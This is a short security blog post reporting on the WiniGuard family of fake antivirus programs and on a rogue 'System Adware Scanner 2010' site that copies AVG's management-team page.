Like clockwork: the next member of the WiniGuard rogue family appears

I blogged about the three generations of the WiniGuard family of rogue security products that began in October of 2008. Friday, the 50th rogue in that line appeared. Analyst Patrick Jordan noted that there appeared to be a newly named clone added to the “genealogy” about every 48 hours. He’s been right.

Monday they found GuardPCS and today they found TheDefender. Its associated web site was registered Dec. 4.

Fraudulent operators behind the rogues seem to be doing two things to confuse Internet users and lure them into purchasing this worthless scare ware:

• “Borrowing” content from legitimate anti-virus company web sites, such as certifications and management team pages, for their own web pages.
• Distributing their rogues with different names and with redesigned graphic interfaces. They usually have web sites associated with the new name. They look like authentic security products, but, as the song said they “take the money and run.”

See our earlier blog entry about the WiniGuard family of rogues.

10 million people will you computers are perfectly safe

New rogue borrows massively from AV company sites

Our friend M.N. Bharath drew our attention to this web site associated with the new System Adware Scanner 2010 rogue security product. Although the group claims 10 million users world-wide, oddly enough their site was only registered Nov. 25.

It seems they also have recruited the entire management team from AVG anti-virus company as well. Right!

Compare the names on the Smart Systems Technologies rogue page.

http://sysadscanner.com/about.php

with AVG’s: http://www.avg.com/us-en/management-team

If that isn’t enough to raise your suspicions, check out the Engrish on this page: http://sysadscanner.com/why.php